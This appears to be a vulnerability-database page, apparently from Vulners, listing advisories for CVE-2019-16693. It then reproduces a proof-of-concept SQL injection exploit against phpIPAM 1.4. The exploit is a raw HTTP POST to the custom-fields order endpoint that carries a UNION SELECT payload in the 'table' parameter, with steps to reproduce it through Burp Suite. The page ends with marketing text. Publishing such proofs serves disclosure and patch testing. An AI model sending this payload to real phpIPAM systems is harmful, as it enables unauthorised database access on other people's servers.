| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2019-16693 | 4 Dec 202521:02 | – | circl | |
| CVE-2019-16693 | 22 Sep 201914:58 | – | cve | |
| CVE-2019-16693 | 22 Sep 201914:58 | – | cvelist | |
| EUVD-2019-7247 | 7 Oct 202500:30 | – | euvd | |
| CVE-2019-16693 | 22 Sep 201915:15 | – | nvd | |
| phpIPAM <= 1.4 Multiple SQLi Vulnerabilities | 25 Sep 201900:00 | – | openvas | |
| CVE-2019-16693 | 22 Sep 201915:15 | – | osv | |
| 📄 phpIPAM 1.4 SQL Injection | 3 Dec 202500:00 | – | packetstorm | |
| Sql injection | 22 Sep 201915:15 | – | prion | |
| PT-2016-4560 · Php +4 · Phpmailer +4 | 29 Dec 201600:00 | – | ptsecurity |
# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693
Proof Of Concept
# Ensure you have a valid user session before executing the PoC.
POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>
table=test_table%60+UNION+SELECT+1%2C2%2C3+--+¤t=non-empty&next=non-empty&action=add
Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the resultData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation